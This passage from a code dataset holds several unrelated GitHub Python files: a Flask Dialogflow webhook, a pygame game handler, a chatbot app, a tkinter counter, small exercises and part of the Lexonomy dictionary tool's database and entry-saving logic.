'verbose_name': 'Obozowicz',\n 'verbose_name_plural': 'Obozowicze',\n },\n ),\n migrations.AddField(\n model_name='camp',\n name='campers',\n field=models.ManyToManyField(to='camping.Camper'),\n ),\n ]\n","repo_name":"niktto/dontstarve_camp_status","sub_path":"camping/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10342881985","text":"from picamera import PiCamera\nimport time\n\n\ncamera = PiCamera()\ntime.sleep(2)\n\nfor i in range(10):\n\ttime1 = time.time()\n\tcamera.capture('/home/pi/raspicam/image.jpg')\n\ttime2 = time.time()\n\tprint((time2-time1)*1000)\n\nprint(camera.framerate)\nprint(camera.shutter_speed 
)","repo_name":"Robot-Sumo/SumoPontifice-Raspberry","sub_path":"raspicam/picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13730086945","text":"#!/usr/bin/env python\n\nimport json\nimport os\nimport requests\nfrom flask import Flask\nfrom flask import request\n\napp = Flask(__name__)\n\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n req = request.get_json(silent=True, force=True)\n message = req.get(\"result\").get(\"fulfillment\").get(\"messages\")[0][\"speech\"]\n responseMessage = json.dumps({\n \"speech\": message,\n \"displayText\": message,\n \"messages\": {\n \"type\": 1,\n \"title\": \"card title\",\n \"subtitle\": \"card text\",\n \"imageUrl\": \"https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png\"\n },\n \"data\": {\n \"google\": {\n \"expectUserResponse\": True,\n \"richResponse\": {\n \"items\": [\n {\n \"simpleResponse\": {\n \"textToSpeech\": message\n }\n }\n ]\n }\n },\n \"facebook\": {\n \"text\": message\n },\n \"slack\": {\n \"text\": message\n }\n },\n \"contextOut\": [],\n \"source\": \"example.com\",\n \"followupEvent\": {}\n })\n if req.get(\"result\").get(\"action\") == \"Feedback\":\n baseurl = \"https://hooks.zapier.com/hooks/catch/3544928/wvzqh2/\"\n r = requests.post(baseurl, data=json.dumps(req))\n elif req.get(\"result\").get(\"action\") == \"RegisterOnline\":\n baseurl = \"https://hooks.zapier.com/hooks/catch/3544928/wvk6pa/\"\n r = requests.post(baseurl, data=json.dumps(req))\n return responseMessage\n\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n app.run(debug=False, port=port, host='0.0.0.0')\n","repo_name":"pnbao/DialogflowWebhook","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33659002991","text":"import pygame as pg\n\n# Load image resources\nIMG_EATING = pg.transform.scale(pg.image.load('./images/dog_eating.png'), (200, 100))\nIMG_MOVING = pg.transform.scale(pg.image.load('./images/dog_move.png'), (200, 100))\nIMG_SLEEPING = pg.transform.scale(pg.image.load('./images/dog_sleeping.png'), (200, 100))\n\n# Initialize variables for later use\nmsg = None\nplayAgainDisplayed = False\n\ndef handle(btns, nova, wolf, window):\n \"\"\"Handles all game events such as button clicks and UI updates\"\"\"\n\n for event in pg.event.get():\n # If the close button is clicked, stop the game\n if event.type == pg.constants.QUIT: quit(200)\n\n # Runs when a mouse button is released\n if event.type == pg.constants.MOUSEBUTTONUP:\n pos = pg.mouse.get_pos() # Position of mouse on screen\n\n # If game isn't done, accept button clicks\n if not playAgainDisplayed:\n # Declare msg globally\n # Reset msg on every click\n global msg\n msg = None\n\n eat, jog, run, sleep = 0, 1, 2, 3 # Position of each button in btns\n\n # Check if/what button was clicked\n # Verify that the action can be done\n # Call the method for the button\n # Call the method for Wolf's move\n # Play the animation for the action\n\n if btns[eat].collidepoint(pos):\n if nova.hunger < nova.maxHunger:\n nova.Eat()\n wolf.ChooseAction()\n\n animateAction(\"eat\", window, nova, wolf)\n else: msg = f\"Nova is full. 
The wolves are {abs(nova.dist - wolf.dist)}km away!\"\n\n if btns[jog].collidepoint(pos):\n nova.Jog()\n wolf.ChooseAction()\n\n animateAction(\"jog\", window, nova, wolf)\n\n if btns[run].collidepoint(pos):\n nova.Run()\n wolf.ChooseAction()\n\n animateAction(\"run\", window, nova, wolf)\n\n if btns[sleep].collidepoint(pos):\n if nova.sleep < nova.maxSleep:\n nova.Sleep()\n wolf.ChooseAction()\n \n animateAction(\"sleep\", window, nova, wolf)\n else: msg = f\"Nova isn't tired. The wolves are {abs(nova.dist - wolf.dist)}km away!\"\n # If game is done, only accept play again\n elif btnPlayAgain.collidepoint(pos): playAgain()\n\ndef isDead(nova, wolf, window):\n \"\"\"Checks if Nova is dead and sets the output message to reflect her death\"\"\"\n\n global msg\n\n if wolf.dist >= nova.dist: msg = \"Nova died! The wolves caught her, but she was a tasty snack!\"\n elif nova.health <= 0: msg = \"Nova died! She ran out of health!\"\n elif nova.hunger <= 0: msg = \"Nova died! She ran out of hunger!\"\n elif nova.energy <= 0: msg = \"Nova died! She ran out of energy!\"\n elif nova.sleep <= 0: msg = \"Nova died! She ran out of sleep!\"\n else: return False\n\n return True\n\ndef isWon(nova, window):\n \"\"\"Checks if Nova has won and sets the output message to reflect that\"\"\"\n\n if nova.dist >= 200:\n global msg\n \n msg = \"Nova won! She made it home safely thanks to your help!\"\n return True\n\ndef forestOverlay(window):\n \"\"\"Covers screen with forest image to hide previous frame\"\"\"\n\n bg = pg.transform.scale(pg.image.load(\"./images/ForestBG.jpg\"), (500, 300)) # Load and size the image\n window.blit(bg, (0, 0)) # Output the image\n\ndef updateStatus(window, nova):\n \"\"\"Updates the status bar to reflect Nova's stats\"\"\"\n\n # Add status bar to screen\n bar = pg.Surface((500, 50)).convert_alpha() # Create and size the status bar\n bar.fill((200, 255, 0, 100)) # Color the status bar\n window.blit(bar, (0, 0)) # Output status bar\n\n # Add Nova's status to the status bar\n font = pg.font.SysFont('cambria', 15) # Font object for text\n status = font.render(str(nova), True, (0, 0, 0)) # Nova's attributes rendered from class' __repr__()\n width, height = status.get_width(), status.get_height() # Get the size of the text for use in centering it\n window.blit(status, (250 - width / 2, 25 - height / 2)) # Output the status to the status bar (centered)\n\ndef handleOutput(window, nova, wolf):\n \"\"\"Handles message output by calling outputMsg() with the output message (if it exists) or the default message\"\"\"\n\n outputMsg(window, msg) if msg else outputMsg(window, f\"The wolves are {abs(nova.dist - wolf.dist)}km away!\")\n\ndef outputMsg(window, msg):\n \"\"\"Outputs the message from handleOutput() to the output bar\"\"\"\n\n # Add output bar to screen\n bar = pg.Surface((500, 50)).convert_alpha() # Create and size the output bar\n bar.fill((200, 255, 0, 130)) # Color the output\n window.blit(bar, (0, 250)) # Output the output bar\n\n # Add output to the output bar\n font = pg.font.SysFont('cambria', 15) # Font object for text\n output = font.render(f\">> {msg}\", True, (0, 0, 0)) # Text to output\n height = output.get_height() # Get the size of the text for use in alignment\n window.blit(output, (10, 275 - height / 2)) # Output the text to the output bar\n\ndef animateAction(action, window, nova, wolf):\n \"\"\"Animates an image to reflect the player's action\"\"\"\n\n # Create a dictionary to link actions to images\n actionImgs = {\n \"eat\": IMG_EATING,\n \"jog\": IMG_MOVING,\n 
\"run\": IMG_MOVING,\n \"sleep\": IMG_SLEEPING\n }\n\n # Get the image for the action\n img = actionImgs[action]\n \n if action == \"jog\" or action == \"run\":\n # Define animation speed\n speed = 2 if action == \"jog\" else 3\n\n x = -200 # Set starting x position for animation\n\n # Runs while the image is still on screen\n while x < 500:\n # Redraw static parts to hide previous frame\n forestOverlay(window)\n updateStatus(window, nova)\n handleOutput(window, nova, wolf)\n\n # Draw the image at the correct position\n window.blit(img, (x, 200 - img.get_height() / 2))\n\n # Update display and increase animation's x position\n pg.display.update()\n x += speed\n else:\n # Initialize variables used for timing\n CLOCK = pg.time.Clock()\n time_elapsed = 0\n\n # While time elapsed is less than animation's FPS * (number of seconds for animation to last)\n while time_elapsed <= 60 * 2:\n # Redraw static parts to hide previous frame\n forestOverlay(window)\n updateStatus(window, nova)\n handleOutput(window, nova, wolf)\n\n # Draw the image at the correct position\n window.blit(img, (250 - img.get_width() / 2, 200 - img.get_height() / 2))\n\n # Add (1/FPS)/second to time_elapsed\n time_elapsed += 1\n\n # Preserve 60 FPS frame rate and update display\n CLOCK.tick(60)\n pg.display.update()\n\ndef showPlayAgainDialogue(window):\n \"\"\"Displays the play again button and dialogue\"\"\"\n\n # Declare variables globally\n global btnPlayAgain, playAgainDisplayed\n\n btnPlayAgain = pg.draw.rect(window, (141, 141, 141), (150, 110, 200, 80)) # Draw the button\n\n # Add text to the play again button\n font = pg.font.SysFont('cambria', 30) # Font object for text\n text = font.render(\"Play Again\", True, (0, 0, 0)) # Text to output\n width, height = text.get_rect().width, text.get_rect().height # Get the size of the text for use in centering it\n window.blit(text, (250 - width / 2, 150 - height / 2)) # Output the text to the play again button (centered)\n\n # Update the game to 'play again screen mode'\n playAgainDisplayed = True\n\ndef playAgain():\n \"\"\"Resets the game variables and GUI and calls the init() method in Main.py\"\"\"\n\n # Declare variables globally\n global playAgainDisplayed, msg\n\n # Remove the play again screen\n playAgainDisplayed = False\n msg = None\n\n # Reinitialize the game\n from Main import init\n init()","repo_name":"BLM16/Homeward-Bound","sub_path":"EventHandler.py","file_name":"EventHandler.py","file_ext":"py","file_size_in_byte":8155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29154705529","text":"from flask import Flask, render_template, request\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ListTrainer\r\napp = Flask(__name__)\r\nmy_bot = ChatBot(\"Academic_bot\")\r\nconversation=open('conv.txt','r').readlines()\r\n\r\n\r\ntrainer = ListTrainer(my_bot)\r\ntrainer.train(conversation)\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route(\"/get\")\r\ndef get_bot_response():\r\n userText = request.args.get('msg')\r\n return str(my_bot.get_response(userText))\r\n\r\nif __name__ == \"__main__\":\r\n app.debug =True\r\n app.run()","repo_name":"vishi06/Academic-Bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35017563223","text":"#!env/bin/python\n\nimport os\nfrom util import *\n\ndef main():\n if 
(opts.backend is None):\n backends = [None]\n else:\n backends = opts.backend\n os.system('sbt \"; project pir; publishAll\"')\n for app in opts.app:\n for backend in backends:\n if (backend is not None):\n genDir = \"out/{}/{}\".format(backend, app)\n else:\n genDir = \"out/{}\".format(app)\n\n print(genDir)\n\n os.chdir(genDir)\n ecode = os.system('sbt \"runMain AccelMain {}\"'.format(' '.join(args)))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stanford-ppl/pir","sub_path":"bin/pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"29394901138","text":"# -*- coding:utf-8 -*-\n\nfrom api.api import API\nfrom pages.android.common.super_page import SuperPage\nfrom pages.android.ffan.fei_fan_membership_page_configs import FeiFanMembershipPageConfigs as FMPC\nfrom pages.logger import logger\n\n\nclass FeiFanMembershipPage(SuperPage):\n '''\n 作者 宋波\n 首页=>我的飞凡=>我的会员卡包=>飞凡会员\n '''\n def __init__(self, testcase, driver, logger):\n super(FeiFanMembershipPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage: 验证飞凡会员页面\n '''\n logger.info(\"Check 凡会员页面 begin\")\n API().assertElementByResourceId(self.testcase,\n self.driver,\n self.logger,\n FMPC.fei_fan_membership_title,\n FMPC.assert_view_timeout)\n logger.info(\"Check 凡会员页面 end\")\n","repo_name":"liu111xiao111/UItest","sub_path":"pages/android/ffan/fei_fan_membership_page.py","file_name":"fei_fan_membership_page.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"29026820304","text":"def temp_list(list):\r\n avg = sum(list) / len(list)\r\n count_more_avg = 0\r\n count_less_avg = 0\r\n for i in list:\r\n if i > avg:\r\n count_more_avg += 1\r\n elif i <= avg:\r\n count_less_avg += 1\r\n count_pairs = 0\r\n for i in range(0, len(list)):\r\n if i<=len(list)-2:\r\n if (list[i] + list[i + 1]) % 2 == 0:\r\n count_pairs += 1\r\n else:\r\n break\r\n return avg, max(list), min(list), count_more_avg, count_less_avg, count_pairs\r\n","repo_name":"DenisHerzhyk/4_Unit_Test_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24606819373","text":"\"\"\"\nETL step wrapper for QA step can be executed on Ec2 resource\n\"\"\"\nfrom .transform import TransformStep\nfrom ..config import Config\n\nconfig = Config()\n\n\nclass QATransformStep(TransformStep):\n \"\"\"QATransform Step class that helps run scripts on resouces for QA checks\n \"\"\"\n\n def __init__(self,\n id,\n pipeline_name,\n script_arguments=None,\n sns_topic_arn=None,\n **kwargs):\n \"\"\"Constructor for the QATransformStep class\n\n Args:\n sns_arn(str): sns topic arn for QA steps\n script_arguments(list of str): list of arguments to the script\n **kwargs(optional): Keyword arguments directly passed to base class\n \"\"\"\n\n if sns_topic_arn is None:\n sns_topic_arn = config.etl.get('SNS_TOPIC_ARN_WARNING', None)\n\n if script_arguments is None:\n script_arguments = list()\n\n script_arguments.append('--test_name=%s' % (pipeline_name + \".\" + id))\n if sns_topic_arn:\n script_arguments.append('--sns_topic_arn=%s' % sns_topic_arn)\n\n super(QATransformStep, self).__init__(\n id=id,\n script_arguments=script_arguments,\n no_output=True,\n **kwargs)\n\n @classmethod\n def 
arguments_processor(cls, etl, input_args):\n \"\"\"Parse the step arguments according to the ETL pipeline\n\n Args:\n etl(ETLPipeline): Pipeline object containing resources and steps\n step_args(dict): Dictionary of the step arguments for the class\n \"\"\"\n input_args = cls.pop_inputs(input_args)\n step_args = cls.base_arguments_processor(etl, input_args)\n step_args['pipeline_name'] = etl.name\n\n return step_args\n","repo_name":"coursera/dataduct","sub_path":"dataduct/steps/qa_transform.py","file_name":"qa_transform.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"54"} +{"seq_id":"2280069605","text":"products = [] #大清單\nwhile True:\n\tname = input('請輸入商品名稱:')\n\tif name == 'q':\n\t\tbreak\n\tprice = input('請輸入價格名稱:')\n\tproducts.append([name, price])\n\t#p = [name, price] \n\t#p = [] #小清單\n\t#p.append(name)\n\t#p.append(price)\n\t#products.append(p)\nprint(products)\nfor p in products:\n\tprint(p)\n\n","repo_name":"clockhsu1976/products","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71981209441","text":"\"\"\"\nhttps://www.hackerrank.com/challenges/python-time-delta/problem\n\nWhen users post an update on social media,such as a URL, image, status update etc., other users in their network are able to view this new post on their news feed. Users can also see exactly when the post was published, i.e, how many hours, minutes or seconds ago.\n\nSince sometimes posts are published and viewed in different time zones, this can be confusing. You are given two timestamps of one such post that a user can see on his newsfeed in the following format:\n\nDay dd Mon yyyy hh:mm:ss +xxxx\n\nHere +xxxx represents the time zone. Your task is to print the absolute difference (in seconds) between them.\n\nInput Format\n\nThe first line contains , the number of testcases.\nEach testcase contains lines, representing time and time .\n\nConstraints\n\n Input contains only valid timestamps\n .\n\nOutput Format\n\nPrint the absolute difference in seconds.\n\nSample Input 0\n\n 2\n Sun 10 May 2015 13:54:36 -0700\n Sun 10 May 2015 13:54:36 -0000\n Sat 02 May 2015 19:54:36 +0530\n Fri 01 May 2015 13:54:36 -0000\n\nSample Output 0\n\n 25200\n 88200\n\nExplanation 0\n\nIn the first query, when we compare the time in UTC for both the time stamps, we see a difference of 7 hours. which is seconds or seconds.\n\nSimilarly, in the second query, time difference is 5 hours and 30 minutes for time zone adjusting for that we have a difference of 1 day and 30 minutes. 
Or\n\"\"\"\nfrom datetime import datetime, timedelta\n\n\ndef get_date(date_string):\n \"\"\"\n\n :param date_string: Sun 10 May 2015 13:54:36 -0700\n :return:\n \"\"\"\n return datetime.strptime(date_string[:-6], '%a %d %b %Y %H:%M:%S'), date_string[-5], timedelta(hours=int(date_string[-4:-2]), minutes=int(date_string[-2:]))\n\n\ndef get_utc_date(date_string):\n \"\"\"\n\n :param date_string: Sun 10 May 2015 13:54:36 -0700\n :return:\n \"\"\"\n timestamp, tmz, tmz_diff = get_date(date_string)\n timestamp = timestamp + tmz_diff if tmz is '-' else timestamp - tmz_diff\n return timestamp\n\n\nif __name__ == \"__main__\":\n inputs = int(input().strip())\n\n for _ in range(inputs):\n date1, date2 = get_utc_date(input().strip()), get_utc_date(input().strip())\n diff = abs(date1 - date2)\n print(diff.days * 86400 + diff.seconds)\n\n\n\"\"\"\nTest Case:\n\n 2\n Sun 10 May 2015 13:54:36 -0700\n Sun 10 May 2015 13:54:36 -0000\n Sat 02 May 2015 19:54:36 +0530\n Fri 01 May 2015 13:54:36 -0000\n\"\"\"","repo_name":"gahan9/mystuff","sub_path":"hackerrank/python/time_delta.py","file_name":"time_delta.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7533655741","text":"from tkinter import *\n\nclass Appli(Frame):\n\n def __init__(self, master):\n super(Appli, self).__init__(master)\n self.grid()\n self.btn_clk=0\n self.btn_clk1=0\n self.create_widget()\n\n def create_widget(self):\n self.btn=Button(self)\n self.btn1=Button(self)\n self.btn2=Button(self)\n self.btn[\"text\"]=\"click:0\"\n self.btn1[\"text\"]=\"Click:0\"\n self.btn2[\"text\"] = \"Reset\"\n self.btn[\"command\"] = self.update_count\n self.btn1[\"command\"] = self.update_count_both\n self.btn2[\"command\"] = self.reset()\n self.btn.grid()\n self.btn1.grid()\n self.btn2.grid()\n\n def update_count(self):\n self.btn_clk+=1\n self.btn[\"text\"] = \"Total Clicks: \"+str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\n def update_count_both(self):\n self.btn_clk+=1\n self.btn_clk1+=1\n self.btn[\"text\"] = \"Total Clicks: \"+str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\n def reset(self):\n self.btn_clk=0\n self.btn_clk1= 0\n self.btn[\"text\"] = \"Total Clicks: \" + str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\nroot=Tk()\nroot.title(\"Click Counter\")\nroot.geometry(\"400x100\")\napp=Appli(root)\nroot.mainloop()\n","repo_name":"StarlordHarsh/Python","sub_path":"Usable Gui.py","file_name":"Usable Gui.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36390929397","text":"#!/usr/bin/python3\n\nimport datetime\nimport json\nimport os\nimport os.path\nimport sqlite3\nimport hashlib\nimport random\nimport string\nimport smtplib, ssl\nimport urllib\nimport jwt\nimport shutil\nimport markdown\nimport re\nimport secrets\nfrom collections import defaultdict\n\nsiteconfig = json.load(open(os.environ.get(\"LEXONOMY_SITECONFIG\",\n \"siteconfig.json\"), encoding=\"utf-8\"))\n\ndefaultDictConfig = {\"editing\": {\"xonomyMode\": \"nerd\", \"xonomyTextEditor\": \"askString\" },\n \"searchability\": {\"searchableElements\": []},\n \"xema\": {\"elements\": {}},\n \"titling\": {\"headwordAnnotations\": [], \"abc\": siteconfig[\"defaultAbc\"]},\n \"flagging\": {\"flag_element\": \"\", \"flags\": []}}\n\nprohibitedDictIDs = [\"login\", \"logout\", 
\"make\", \"signup\", \"forgotpwd\", \"changepwd\", \"users\", \"dicts\", \"oneclick\", \"recoverpwd\", \"createaccount\", \"consent\", \"userprofile\"];\n\n# db management\ndef getDB(dictID):\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], \"dicts/\"+dictID+\".sqlite\"))\n conn.row_factory = sqlite3.Row\n conn.executescript(\"PRAGMA journal_mode=WAL; PRAGMA foreign_keys=on\")\n return conn\n\ndef getMainDB():\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], 'lexonomy.sqlite'))\n conn.row_factory = sqlite3.Row\n return conn\n\ndef getLinkDB():\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], 'crossref.sqlite'))\n conn.row_factory = sqlite3.Row\n return conn\n\n# SMTP\ndef sendmail(mailTo, mailSubject, mailText):\n if siteconfig[\"mailconfig\"] and siteconfig[\"mailconfig\"][\"host\"] and siteconfig[\"mailconfig\"][\"port\"]:\n if siteconfig[\"mailconfig\"][\"secure\"]:\n context = ssl.create_default_context()\n server = smtplib.SMTP_SSL(siteconfig[\"mailconfig\"][\"host\"], siteconfig[\"mailconfig\"][\"port\"], context=context)\n else:\n server = smtplib.SMTP(siteconfig[\"mailconfig\"][\"host\"], siteconfig[\"mailconfig\"][\"port\"])\n message = \"Subject: \" + mailSubject + \"\\n\\n\" + mailText\n server.sendmail(siteconfig[\"mailconfig\"][\"from\"], mailTo, message)\n server.quit()\n\n\n# config\ndef readDictConfigs(dictDB):\n configs = {\"siteconfig\": siteconfig}\n c = dictDB.execute(\"select * from configs\")\n for r in c.fetchall():\n configs[r[\"id\"]] = json.loads(r[\"json\"])\n for conf in [\"ident\", \"publico\", \"users\", \"kex\", \"titling\", \"flagging\",\n \"searchability\", \"xampl\", \"thes\", \"collx\", \"defo\", \"xema\",\n \"xemplate\", \"editing\", \"subbing\", \"download\", \"links\", \"autonumber\"]:\n if not conf in configs:\n configs[conf] = defaultDictConfig.get(conf, {})\n\n for key in configs.keys():\n if type(configs[key]) is dict:\n configs[key] = defaultdict(lambda: None, configs[key])\n\n return configs\n\ndef addSubentryParentTags(db, entryID, xml):\n from xml.dom import minidom, Node\n doc = minidom.parseString(xml)\n els = []\n _els = doc.getElementsByTagName(\"*\")\n els.append(_els[0])\n for i in range(1, len(_els)):\n if _els[i].getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\"):\n els.append(_els[i])\n for el in els:\n subentryID = el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n if el.parentNode.nodeType != Node.ELEMENT_NODE:\n subentryID = entryID\n c = db.execute(\"select s.parent_id, e.title from sub as s inner join entries as e on e.id=s.parent_id where s.child_id=?\", (subentryID,))\n for r in c.fetchall():\n pel = doc.createElementNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryParent\")\n pel.setAttribute(\"id\", str(r[\"parent_id\"]))\n pel.setAttribute(\"title\", r[\"title\"])\n el.appendChild(pel)\n return doc.toxml()\n\ndef removeSubentryParentTags(xml):\n return re.sub(r\"]*>\", \"\", xml)\n\n# auth\ndef verifyLogin(email, sessionkey):\n conn = getMainDB()\n now = datetime.datetime.utcnow()\n yesterday = now - datetime.timedelta(days=1)\n email = email.lower()\n c = conn.execute(\"select email, ske_apiKey, ske_username, apiKey, consent from users where email=? and sessionKey=? and sessionLast>=?\", (email, sessionkey, yesterday))\n user = c.fetchone()\n if not user:\n return {\"loggedin\": False, \"email\": None}\n conn.execute(\"update users set sessionLast=? 
where email=?\", (now, email))\n conn.commit()\n ret = {\"loggedin\": True, \"email\": email, \"isAdmin\": email in siteconfig[\"admins\"],\n \"ske_username\": user[\"ske_username\"], \"ske_apiKey\": user[\"ske_apiKey\"],\n \"apiKey\": user[\"apiKey\"], \"consent\": user[\"consent\"] == 1}\n return ret\n\ndef verifyLoginAndDictAccess(email, sessionkey, dictDB):\n ret = verifyLogin(email, sessionkey)\n configs = readDictConfigs(dictDB)\n dictAccess = configs[\"users\"].get(email)\n if ret[\"loggedin\"] == False or (not dictAccess and (not \"isAdmin\" in ret or not ret[\"isAdmin\"])):\n return {\"loggedin\": ret[\"loggedin\"], \"email\": email, \"dictAccess\": False, \"isAdmin\": False}, configs\n ret[\"dictAccess\"] = dictAccess\n for r in [\"canEdit\", \"canConfig\", \"canDownload\", \"canUpload\"]:\n ret[r] = ret.get(\"isAdmin\") or (dictAccess and dictAccess[r])\n return ret, configs\n\ndef deleteEntry(db, entryID, email):\n # tell my parents that they need a refresh:\n db.execute (\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID,))\n # delete me:\n db.execute (\"delete from entries where id=?\", (entryID,))\n # tell history that I have been deleted:\n db.execute (\"insert into history(entry_id, action, [when], email, xml) values(?,?,?,?,?)\",\n (entryID, \"delete\", datetime.datetime.utcnow(), email, None))\n db.commit()\n\ndef readEntry(db, configs, entryID):\n c = db.execute(\"select * from entries where id=?\", (entryID,))\n row = c.fetchone()\n if not row:\n return 0, \"\", \"\"\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n if configs[\"subbing\"]:\n xml = addSubentryParentTags(db, entryID, xml)\n if configs[\"links\"]:\n xml = updateEntryLinkables(db, entryID, xml, configs, False, False)\n return entryID, xml, row[\"title\"]\n\ndef createEntry(dictDB, configs, entryID, xml, email, historiography):\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n xml = setHousekeepingAttributes(entryID, xml, configs[\"subbing\"])\n xml = removeSubentryParentTags(xml)\n title = getEntryTitle(xml, configs[\"titling\"])\n sortkey = toSortKey(getSortTitle(xml, configs[\"titling\"]), abc)\n doctype = getDoctype(xml)\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n # entry title already exists?\n c = dictDB.execute(\"select id from entries where title = ? 
and id <> ?\", (title, entryID))\n r = c.fetchone()\n feedback = {\"type\": \"saveFeedbackHeadwordExists\", \"info\": r[\"id\"]} if r else None\n if entryID:\n sql = \"insert into entries(id, xml, title, sortkey, needs_refac, needs_resave, doctype) values(?, ?, ?, ?, ?, ?, ?)\"\n params = (entryID, xml, title, sortkey, needs_refac, needs_resave, doctype)\n else:\n sql = \"insert into entries(xml, title, sortkey, needs_refac, needs_resave, doctype) values(?, ?, ?, ?, ?, ?)\"\n params = (xml, title, sortkey, needs_refac, needs_resave, doctype)\n c = dictDB.execute(sql, params)\n entryID = c.lastrowid\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True), 1))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"create\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n return entryID, xml, feedback\n\ndef updateEntry(dictDB, configs, entryID, xml, email, historiography):\n c = dictDB.execute(\"select id, xml from entries where id=?\", (entryID, ))\n row = c.fetchone()\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n xml = setHousekeepingAttributes(entryID, xml, configs[\"subbing\"])\n xml = removeSubentryParentTags(xml)\n newxml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", xml)\n newxml = re.sub(r\"(\\=)\\\"([^\\\"]*)\\\"\", r\"\\1'\\2'\", newxml)\n newxml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", newxml)\n newxml = re.sub(r\" lxnm:linkable='[^']+'\", \"\", newxml)\n if not row:\n adjustedEntryID, adjustedXml, feedback = createEntry(dictDB, configs, entryID, xml, email, historiography)\n if configs[\"links\"]:\n adjustedXml = updateEntryLinkables(dictDB, adjustedEntryID, adjustedXml, configs, True, True)\n return adjustedEntryID, adjustedXml, True, feedback\n else:\n oldxml = row[\"xml\"]\n oldxml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", oldxml)\n oldxml = re.sub(r\"(\\=)\\\"([^\\\"]*)\\\"\", r\"\\1'\\2'\", oldxml)\n oldxml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", oldxml)\n oldxml = re.sub(r\" lxnm:linkable='[^']+'\", \"\", oldxml)\n if oldxml == newxml:\n return entryID, xml, False, None\n else:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID,))\n title = getEntryTitle(xml, configs[\"titling\"])\n sortkey = toSortKey(getSortTitle(xml, configs[\"titling\"]), abc)\n doctype = getDoctype(xml)\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n # entry title already exists?\n c = dictDB.execute(\"select id from entries where title = ? and id <> ?\", (title, entryID))\n r = c.fetchone()\n feedback = {\"type\": \"saveFeedbackHeadwordExists\", \"info\": r[\"id\"]} if r else None\n dictDB.execute(\"update entries set doctype=?, xml=?, title=?, sortkey=?, needs_refac=?, needs_resave=? where id=?\", (doctype, xml, title, sortkey, needs_refac, needs_resave, entryID))\n dictDB.execute(\"update searchables set txt=? where entry_id=? 
